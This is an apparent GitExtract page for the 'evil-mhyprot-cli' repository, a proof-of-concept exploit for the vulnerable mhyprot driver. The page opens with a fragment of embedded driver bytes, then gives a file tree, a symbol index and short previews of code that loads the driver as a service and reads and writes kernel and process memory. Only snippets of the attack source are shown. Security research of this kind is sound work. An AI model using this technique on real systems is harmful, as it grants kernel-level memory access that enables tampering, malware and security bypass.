0xCF, 0xFF, 0x15, 0xE1, 0x4D, 0x00, 0x00, 0x48, 0x8B, 0x3B, 0x48, 0x3B,
0xFB, 0x75, 0x94, 0x48, 0x8B, 0x5C, 0x24, 0x30, 0x48, 0x8B, 0x74, 0x24,
0x38, 0x48, 0x83, 0xC4, 0x20, 0x5F, 0xC3, 0xB9, 0x03, 0x00, 0x00, 0x00,
0xCD, 0x29, 0xCC, 0xCC, 0x48, 0x89, 0x5C, 0x24, 0x10, 0x48, 0x89, 0x74,
0x24, 0x18, 0x48, 0x89, 0x7C, 0x24, 0x20, 0x55, 0x48, 0x8B, 0xEC, 0x48,
0x83, 0xEC, 0x60, 0x8B, 0x01, 0x33, 0xF6, 0x48, 0x83, 0x65, 0x10, 0x00,
0x35, 0xFE, 0xCD, 0x00, 0x00, 0x89, 0x01, 0x48, 0x8B, 0xDA, 0x48, 0x85,
0xD2, 0x0F, 0x84, 0x4D, 0x01, 0x00, 0x00, 0x85, 0xC0, 0x0F, 0x84, 0x45,
0x01, 0x00, 0x00, 0x48, 0x8D, 0x4D, 0xC0, 0x48, 0x89, 0x4D, 0xC8, 0x48,
0x8D, 0x55, 0x10, 0x48, 0x8D, 0x4D, 0xC0, 0x48, 0x89, 0x4D, 0xC0, 0x8B,
0xC8, 0xE8, 0xEA, 0x41, 0x00, 0x00, 0x8B, 0xF8, 0x85, 0xC0, 0x0F, 0x88,
0xF9, 0x00, 0x00, 0x00, 0x48, 0x8B, 0x4D, 0x10, 0x48, 0x8D, 0x55, 0xD0,
0xE8, 0xF5, 0x41, 0x00, 0x00, 0x4C, 0x8B, 0x05, 0xDC, 0x4D, 0x00, 0x00,
0x48, 0x8D, 0x4D, 0xC0, 0x41, 0xB1, 0x01, 0xBA, 0x00, 0x00, 0x01, 0x00,
0x4D, 0x8B, 0x00, 0xE8, 0x80, 0xFD, 0xFF, 0xFF, 0x48, 0x8D, 0x4D, 0xD0,
0x8B, 0xF8, 0xE8, 0xD5, 0x41, 0x00, 0x00, 0x85, 0xFF, 0x0F, 0x88, 0xBE,
0x00, 0x00, 0x00, 0x4C, 0x8B, 0x45, 0xC0, 0x48, 0x8D, 0x4D, 0xC0, 0x49,
0x8B, 0xC0, 0x4C, 0x3B, 0xC1, 0x74, 0x0E, 0x48, 0x8B, 0x00, 0x48, 0x8D,
0x4D, 0xC0, 0xFF, 0xC6, 0x48, 0x3B, 0xC1, 0x75, 0xF2, 0x48, 0x8B, 0x03,
0x8B, 0xCE, 0x48, 0x89, 0x0B, 0x48, 0x3B, 0xC1, 0x73, 0x0A, 0xBF, 0x23,
0x00, 0x00, 0xC0, 0xE9, 0x8D, 0x00, 0x00, 0x00, 0x45, 0x33, 0xC9, 0x48,
0x8D, 0x45, 0xC0, 0x49, 0x8B, 0xD0, 0x4C, 0x3B, 0xC0, 0x0F, 0x84, 0x83,
0x00, 0x00, 0x00, 0x48, 0x8B, 0x42, 0x18, 0x4B, 0x8D, 0x0C, 0x49, 0x48,
0x03, 0xC9, 0x41, 0xFF, 0xC1, 0x48, 0x89, 0x44, 0xCB, 0x10, 0x8B, 0x42,
0x20, 0x89, 0x44, 0xCB, 0x18, 0x48, 0x8B, 0x42, 0x10, 0x48, 0x89, 0x44,
0xCB, 0x08, 0x8B, 0x42, 0x34, 0x89, 0x44, 0xCB, 0x2C, 0x48, 0x8B, 0x42,
0x28, 0x48, 0x89, 0x44, 0xCB, 0x20, 0x8B, 0x42, 0x30, 0x89, 0x44, 0xCB,
0x28, 0x8B, 0x42, 0x38, 0x89, 0x44, 0xCB, 0x30, 0x48, 0x8D, 0x45, 0xC0,
0x48, 0x8B, 0x12, 0x48, 0x3B, 0xD0, 0x75, 0xB3, 0xEB, 0x2B, 0x49, 0x8B,
0x00, 0x4C, 0x39, 0x40, 0x08, 0x75, 0x3E, 0x49, 0x8B, 0x48, 0x08, 0x4C,
0x39, 0x01, 0x75, 0x35, 0x48, 0x89, 0x01, 0xBA, 0x4D, 0x54, 0x46, 0x47,
0x48, 0x89, 0x48, 0x08, 0x49, 0x8B, 0xC8, 0xFF, 0x15, 0x67, 0x4C, 0x00,
0x00, 0x4C, 0x8B, 0x45, 0xC0, 0x48, 0x8D, 0x45, 0xC0, 0x4C, 0x3B, 0xC0,
0x75, 0xCC, 0x48, 0x8B, 0x4D, 0x10, 0x48, 0x85, 0xC9, 0x74, 0x06, 0xFF,
0x15, 0xD3, 0x4E, 0x00, 0x00, 0x8B, 0xC7, 0xEB, 0x0C, 0xB9, 0x03, 0x00,
0x00, 0x00, 0xCD, 0x29, 0xB8, 0x0D, 0x00, 0x00, 0xC0, 0x4C, 0x8D, 0x5C,
0x24, 0x60, 0x49, 0x8B, 0x5B, 0x18, 0x49, 0x8B, 0x73, 0x20, 0x49, 0x8B,
0x7B, 0x28, 0x49, 0x8B, 0xE3, 0x5D, 0xC3, 0xCC, 0x48, 0x83, 0xEC, 0x28,
0xFF, 0x15, 0xD2, 0x4C, 0x00, 0x00, 0x48, 0xF7, 0xD8, 0x1B, 0xC0, 0x83,
0xE0, 0xE0, 0x83, 0xC0, 0x40, 0x48, 0x83, 0xC4, 0x28, 0xC3, 0xCC, 0xCC,
0x40, 0x53, 0x48, 0x83, 0xEC, 0x20, 0x33, 0xDB, 0x48, 0x8D, 0x54, 0x24,
0x38, 0x48, 0x89, 0x5C, 0x24, 0x38, 0xE8, 0x71, 0x40, 0x00, 0x00, 0x85,
0xC0, 0x78, 0x19, 0x48, 0x8B, 0x4C, 0x24, 0x38, 0xFF, 0x15, 0xD2, 0x4C,
0x00, 0x00, 0x48, 0x8B, 0x4C, 0x24, 0x38, 0x48, 0x8B, 0xD8, 0xFF, 0x15,
0x5C, 0x4E, 0x00, 0x00, 0x48, 0x8B, 0xC3, 0x48, 0x83, 0xC4, 0x20, 0x5B,
0xC3, 0xCC, 0xCC, 0xCC, 0x48, 0x89, 0x5C, 0x24, 0x08, 0x48, 0x89, 0x74,
0x24, 0x10, 0x57, 0x48, 0x83, 0xEC, 0x30, 0x33, 0xDB, 0x48, 0x89, 0x5C,
0x24, 0x20, 0xE8, 0xA9, 0x20, 0x00, 0x00, 0x48, 0x8B, 0xF8, 0x48, 0x89,
0x44, 0x24, 0x20, 0xEB, 0x07, 0x33, 0xDB, 0x48, 0x8B, 0x7C, 0x24, 0x20,
0x48, 0x8B, 0xCF, 0xFF, 0x15, 0xF3, 0x4B, 0x00, 0x00, 0x84, 0xC0, 0x75,
0x04, 0x33, 0xC0, 0xEB, 0x30, 0x48, 0x83, 0xFF, 0xFF, 0x74, 0xF6, 0x48,
0x85, 0xFF, 0x74, 0xF1, 0x48, 0x8D, 0x4F, 0xD0, 0xFF, 0x15, 0xD6, 0x4B,
0x00, 0x00, 0x84, 0xC0, 0x74, 0xE3, 0x48, 0x39, 0x5F, 0xD0, 0x76, 0xDD,
0x48, 0x8B, 0xCF, 0xE8, 0x1C, 0x00, 0x00, 0x00, 0x3C, 0x01, 0x48, 0x0F,
0x45, 0xDF, 0x48, 0x8B, 0xC3, 0x48, 0x8B, 0x5C, 0x24, 0x40, 0x48, 0x8B,
0x74, 0x24, 0x48, 0x48, 0x83, 0xC4, 0x30, 0x5F, 0xC3, 0xCC, 0xCC, 0xCC,
0x48, 0x89, 0x5C, 0x24, 0x08, 0x57, 0x48, 0x83, 0xEC, 0x20, 0x48, 0x8B,
0xD9, 0xFF, 0x15, 0x95, 0x4B, 0x00, 0x00, 0x84, 0xC0, 0x74, 0x61, 0x48,
0x8B, 0x05, 0xDA, 0x71, 0x00, 0x00, 0x48, 0x85, 0xC0, 0x74, 0x23, 0x48,
0x8D, 0x3C, 0x18, 0x48, 0x8B, 0xCF, 0xFF, 0x15, 0x78, 0x4B, 0x00, 0x00,
0x84, 0xC0, 0x74, 0x44, 0x48, 0x8B, 0x0F, 0x48, 0x85, 0xC9, 0x74, 0x3C,
0xFF, 0x15, 0x66, 0x4B, 0x00, 0x00, 0x84, 0xC0, 0x74, 0x32, 0x48, 0x8B,
0x05, 0xA3, 0x71, 0x00, 0x00, 0x48, 0x85, 0xC0, 0x74, 0x22, 0x48, 0x03,
0xD8, 0x48, 0x8B, 0xCB, 0xFF, 0x15, 0x4A, 0x4B, 0x00, 0x00, 0x84, 0xC0,
0x74, 0x16, 0x48, 0x8B, 0x0B, 0x48, 0x85, 0xC9, 0x74, 0x0E, 0xFF, 0x15,
0x38, 0x4B, 0x00, 0x00, 0x84, 0xC0, 0x74, 0x04, 0x32, 0xC0, 0xEB, 0x02,
0xB0, 0x01, 0x48, 0x8B, 0x5C, 0x24, 0x30, 0x48, 0x83, 0xC4, 0x20, 0x5F,
0xC3, 0xCC, 0xCC, 0xCC, 0x48, 0x8B, 0xC4, 0x48, 0x89, 0x58, 0x08, 0x57,
0x48, 0x83, 0xEC, 0x30, 0x8B, 0xF9, 0x83, 0x48, 0xE8, 0xFF, 0x33, 0xDB,
0x48, 0x89, 0x58, 0x10, 0x8B, 0xCF, 0x48, 0x8D, 0x50, 0x10, 0xE8, 0x1D,
0x3F, 0x00, 0x00, 0x85, 0xC0, 0x79, 0x0E, 0x8B, 0xCF, 0xE8, 0xCA, 0xFE,
0xFF, 0xFF, 0x48, 0x89, 0x44, 0x24, 0x48, 0xEB, 0x10, 0x48, 0x8B, 0x4C,
0x24, 0x48, 0xFF, 0x15, 0x08, 0x4D, 0x00, 0x00, 0x48, 0x8B, 0x44, 0x24,
0x48, 0x48, 0x85, 0xC0, 0x0F, 0x95, 0xC3, 0x89, 0x5C, 0x24, 0x20, 0xEB,
0x04, 0x8B, 0x5C, 0x24, 0x20, 0x8B, 0xC3, 0x48, 0x8B, 0x5C, 0x24, 0x40,
0x48, 0x83, 0xC4, 0x30, 0x5F, 0xC3, 0xCC, 0xCC, 0x48, 0x8B, 0xC4, 0x48,
0x89, 0x58, 0x08, 0x48, 0x89, 0x70, 0x18, 0x48, 0x89, 0x78, 0x20, 0x41,
0x56, 0x48, 0x83, 0xEC, 0x30, 0x33, 0xDB, 0x48, 0x89, 0x58, 0x10, 0x40,
0xB7, 0x01, 0x40, 0x88, 0x78, 0xE8, 0x8B, 0xC9, 0x48, 0x8D, 0x50, 0x10,
0xE8, 0xAF, 0x3E, 0x00, 0x00, 0x40, 0x0F, 0xB6, 0xF7, 0x85, 0xC0, 0x0F,
0x48, 0xF3, 0x40, 0x88, 0x74, 0x24, 0x20, 0xEB, 0x0A, 0x33, 0xDB, 0x40,
0xB7, 0x01, 0x40, 0x8A, 0x74, 0x24, 0x20, 0x48, 0x8B, 0x4C, 0x24, 0x48,
0x48, 0x85, 0xC9, 0x75, 0x05, 0x83, 0xC8, 0xFF, 0xEB, 0x28, 0xFF, 0x15,
0xB8, 0x4A, 0x00, 0x00, 0x44, 0x8B, 0xF3, 0x48, 0x85, 0xC0, 0x41, 0x0F,
0x94, 0xC6, 0x48, 0x8B, 0x4C, 0x24, 0x48, 0x48, 0x85, 0xC9, 0x74, 0x0B,
0x40, 0x3A, 0xF7, 0x75, 0x06, 0xFF, 0x15, 0x69, 0x4C, 0x00, 0x00, 0x41,
0x8B, 0xC6, 0x48, 0x8B, 0x5C, 0x24, 0x40, 0x48, 0x8B, 0x74, 0x24, 0x50,
0x48, 0x8B, 0x7C, 0x24, 0x58, 0x48, 0x83, 0xC4, 0x30, 0x41, 0x5E, 0xC3,
0xE9, 0x03, 0x00, 0x00, 0x00, 0xCC, 0xCC, 0xCC, 0x85, 0xC9, 0x0F, 0x84,
0xC1, 0x00, 0x00, 0x00, 0x48, 0x8B, 0xC4, 0x48, 0x89, 0x58, 0x08, 0x48,
0x89, 0x70, 0x20, 0x57, 0x48, 0x83, 0xEC, 0x50, 0x33, 0xDB, 0x40, 0xB7,
0x01, 0x40, 0x88, 0x78, 0xE8, 0x48, 0x89, 0x58, 0x18, 0x48, 0x89, 0x58,
0x10, 0x8B, 0xC9, 0x48, 0x8D, 0x50, 0x10, 0xE8, 0x0C, 0x3E, 0x00, 0x00,
0x40, 0x0F, 0xB6, 0xF7, 0x85, 0xC0, 0x0F
gitextract_ep4t_2av/
├── .gitignore
├── .gitmodules
├── IDA/
│ ├── FUN_0001d000.cpp
│ ├── FUN_0001d6e0.cpp
│ ├── sub_FFFFF800188CD000.txt
│ └── sub_FFFFF800188CD6E0.txt
├── LICENSE
├── README.md
├── evil-mhyprot-cli.sln
├── seedmap.txt
└── src/
├── evil-mhyprot-cli.filters
├── evil-mhyprot-cli.vcxproj
├── file_utils.cpp
├── file_utils.hpp
├── logger.hpp
├── main.cpp
├── mhyprot.cpp
├── mhyprot.hpp
├── nt.hpp
├── raw_driver.hpp
├── service_utils.cpp
├── service_utils.hpp
├── sup.hpp
├── win_utils.cpp
└── win_utils.hpp
SYMBOL INDEX (25 symbols across 12 files)
FILE: IDA/FUN_0001d000.cpp
function ulonglong (line 5) | ulonglong IOCTL_FUN_0001d000(
FILE: IDA/FUN_0001d6e0.cpp
function undefined8 (line 8) | undefined8 IOCTL_FUN_0001d6e0(undefined8 param_1,longlong param_2)
FILE: src/file_utils.hpp
type file_utils (line 6) | namespace file_utils
FILE: src/logger.hpp
type logger (line 7) | namespace logger
function log (line 10) | __forceinline void log(const char* format, T const& ... args)
FILE: src/main.cpp
function main (line 23) | int main(int argc, const char** argv)
FILE: src/mhyprot.hpp
type mhyprot (line 27) | namespace mhyprot
type _MHYPROT_INITIALIZE (line 29) | struct _MHYPROT_INITIALIZE
type _MHYPROT_KERNEL_READ_REQUEST (line 36) | struct _MHYPROT_KERNEL_READ_REQUEST
type _MHYPROT_USER_READ_WRITE_REQUEST (line 46) | struct _MHYPROT_USER_READ_WRITE_REQUEST
type detail (line 59) | namespace detail
type driver_impl (line 69) | namespace driver_impl
function T (line 77) | __forceinline T read_kernel_memory(uint64_t address)
function T (line 85) | __forceinline T read_user_memory(uint32_t process_id, uint64_t address)
function write_user_memory (line 93) | __forceinline bool write_user_memory(uint32_t process_id, uint64_t a...
FILE: src/nt.hpp
type _SYSTEM_INFORMATION_CLASS (line 44) | enum _SYSTEM_INFORMATION_CLASS
type _SYSTEM_MODULE_INFORMATION_ENTRY (line 131) | struct _SYSTEM_MODULE_INFORMATION_ENTRY
type _SYSTEM_MODULE_INFORMATION (line 147) | struct _SYSTEM_MODULE_INFORMATION
FILE: src/raw_driver.hpp
type resource (line 4) | namespace resource
FILE: src/service_utils.cpp
function SC_HANDLE (line 6) | SC_HANDLE service_utils::open_sc_manager()
function SC_HANDLE (line 15) | SC_HANDLE service_utils::create_service(const std::string_view driver_path)
FILE: src/service_utils.hpp
type service_utils (line 16) | namespace service_utils
FILE: src/sup.hpp
type sup (line 8) | namespace sup
function perform_tests (line 13) | __forceinline void perform_tests(const uint32_t process_id)
FILE: src/win_utils.hpp
type win_utils (line 13) | namespace win_utils
Condensed preview — 25 files, each showing path, character count, and a content snippet. Download the .json file or copy for the full structured content (8,294K chars).
[
{
"path": ".gitignore",
"chars": 6217,
"preview": "## Ignore Visual Studio temporary files, build results, and\n## files generated by popular Visual Studio add-ons.\n##\n## G"
},
{
"path": ".gitmodules",
"chars": 97,
"preview": "[submodule \"libmhyprot\"]\n\tpath = libmhyprot\n\turl = https://github.com/kkent030315/libmhyprot.git\n"
},
{
"path": "IDA/FUN_0001d000.cpp",
"chars": 9319,
"preview": "//\n// Pseudocode\n//\n\nulonglong IOCTL_FUN_0001d000(\nuint param_1,\nulonglong *param_2,\nuint param_3,\nulonglong **param_4,\n"
},
{
"path": "IDA/FUN_0001d6e0.cpp",
"chars": 5914,
"preview": "\n/* WARNING: Globals starting with '_' overlap smaller symbols at the same address */\n\n//\n// Pseudocode\n//\n\nundefined8 I"
},
{
"path": "IDA/sub_FFFFF800188CD000.txt",
"chars": 28624,
"preview": "PAGE:FFFFF800188CD000 ; =============== S U B R O U T I N E =======================================\nPAGE:FFFFF800188CD00"
},
{
"path": "IDA/sub_FFFFF800188CD6E0.txt",
"chars": 19844,
"preview": "PAGE:FFFFF800188CD6E0 ; =============== S U B R O U T I N E =======================================\nPAGE:FFFFF800188CD6E"
},
{
"path": "LICENSE",
"chars": 1066,
"preview": "MIT License\n\nCopyright (c) 2020 Kento Oki\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\n"
},
{
"path": "README.md",
"chars": 13028,
"preview": "\n\n\n\n# evil-mhyprot-cli\nA PoC for vulnerable driver \"mhypr"
},
{
"path": "evil-mhyprot-cli.sln",
"chars": 2018,
"preview": "\nMicrosoft Visual Studio Solution File, Format Version 12.00\n# Visual Studio Version 16\nVisualStudioVersion = 16.0.3032"
},
{
"path": "seedmap.txt",
"chars": 12456,
"preview": "[+] seedmap (00000): 0x4068070C4A24D178\n[+] seedmap (00001): 0x6999A42A61B1639\n[+] seedmap (00002): 0xDC4C2DCFD11B8DA\n[+"
},
{
"path": "src/evil-mhyprot-cli.filters",
"chars": 2081,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuil"
},
{
"path": "src/evil-mhyprot-cli.vcxproj",
"chars": 7723,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project DefaultTargets=\"Build\" xmlns=\"http://schemas.microsoft.com/developer/msb"
},
{
"path": "src/file_utils.cpp",
"chars": 393,
"preview": "#include \"file_utils.hpp\"\n\n//\n// create file from memory\n//\nbool file_utils::create_file_from_buffer(\n\tconst std::string"
},
{
"path": "src/file_utils.hpp",
"chars": 188,
"preview": "#pragma once\n#include <Windows.h>\n#include <string>\n#include <fstream>\n\nnamespace file_utils\n{\n\tbool create_file_from_bu"
},
{
"path": "src/logger.hpp",
"chars": 287,
"preview": "#pragma once\n#include <iostream>\n\n#define LOG_ERROR() \\\n\tlogger::log(\"[!] failed at in %s:%d, (0x%lX)\\n\", __FILE__, __LI"
},
{
"path": "src/main.cpp",
"chars": 2014,
"preview": "#include <iostream>\n\n#include \"logger.hpp\"\n#include \"win_utils.hpp\"\n#include \"mhyprot.hpp\"\n#include \"sup.hpp\"\n\n#define C"
},
{
"path": "src/mhyprot.cpp",
"chars": 8686,
"preview": "#include \"mhyprot.hpp\"\n\n//\n// initialization of its service and device\n//\nbool mhyprot::init()\n{\n logger::log(\"[>] lo"
},
{
"path": "src/mhyprot.hpp",
"chars": 2543,
"preview": "#pragma once\n#include <Windows.h>\n#include <fstream>\n#include <filesystem>\n\n#include \"logger.hpp\"\n#include \"raw_driver.h"
},
{
"path": "src/nt.hpp",
"chars": 7185,
"preview": "#pragma once\n#include <Windows.h>\n\n//\n// windows native definitions\n//\n\n#ifndef NT_SUCCESS\n#define NT_SUCCESS(Status) (("
},
{
"path": "src/raw_driver.hpp",
"chars": 7831020,
"preview": "#pragma once\n#include <cstdint>\n\nnamespace resource\n{\n\tconst uint8_t raw_driver[] =\n\t{\n\t\t0x4D, 0x5A, 0x90, 0x00, 0x03, 0"
},
{
"path": "src/service_utils.cpp",
"chars": 3146,
"preview": "#include \"service_utils.hpp\"\n\n//\n// open service control manager to operate services\n//\nSC_HANDLE service_utils::open_sc"
},
{
"path": "src/service_utils.hpp",
"chars": 723,
"preview": "#pragma once\n#include <Windows.h>\n#include <string>\n\n#include \"logger.hpp\"\n#include \"win_utils.hpp\"\n#include \"mhyprot.hp"
},
{
"path": "src/sup.hpp",
"chars": 1578,
"preview": "#pragma once\n#include <Windows.h>\n\n#include \"logger.hpp\"\n#include \"win_utils.hpp\"\n#include \"mhyprot.hpp\"\n\nnamespace sup\n"
},
{
"path": "src/win_utils.cpp",
"chars": 3646,
"preview": "#include \"win_utils.hpp\"\n\n//\n// find the process id by specific name using ToolHelp32Snapshot\n//\nuint32_t win_utils::fin"
},
{
"path": "src/win_utils.hpp",
"chars": 565,
"preview": "#pragma once\n#include <Windows.h>\n#include <string>\n#include <memory>\n#include <TlHelp32.h>\n\n#include \"logger.hpp\"\n#incl"
}
]
About this extraction
This page contains the full source code of the leeza007/evil-mhyprot-cli GitHub repository, extracted and formatted as plain text for AI agents and large language models (LLMs). The extraction includes 25 files (7.6 MB), approximately 2.0M tokens, and a symbol index with 25 extracted functions, classes, methods, constants, and types. Use this with OpenClaw, Claude, ChatGPT, Cursor, Windsurf, or any other AI tool that accepts text input. You can copy the full output to your clipboard or download it as a .txt file.
Extracted by GitExtract — free GitHub repo to text converter for AI. Built by Nikandr Surkov.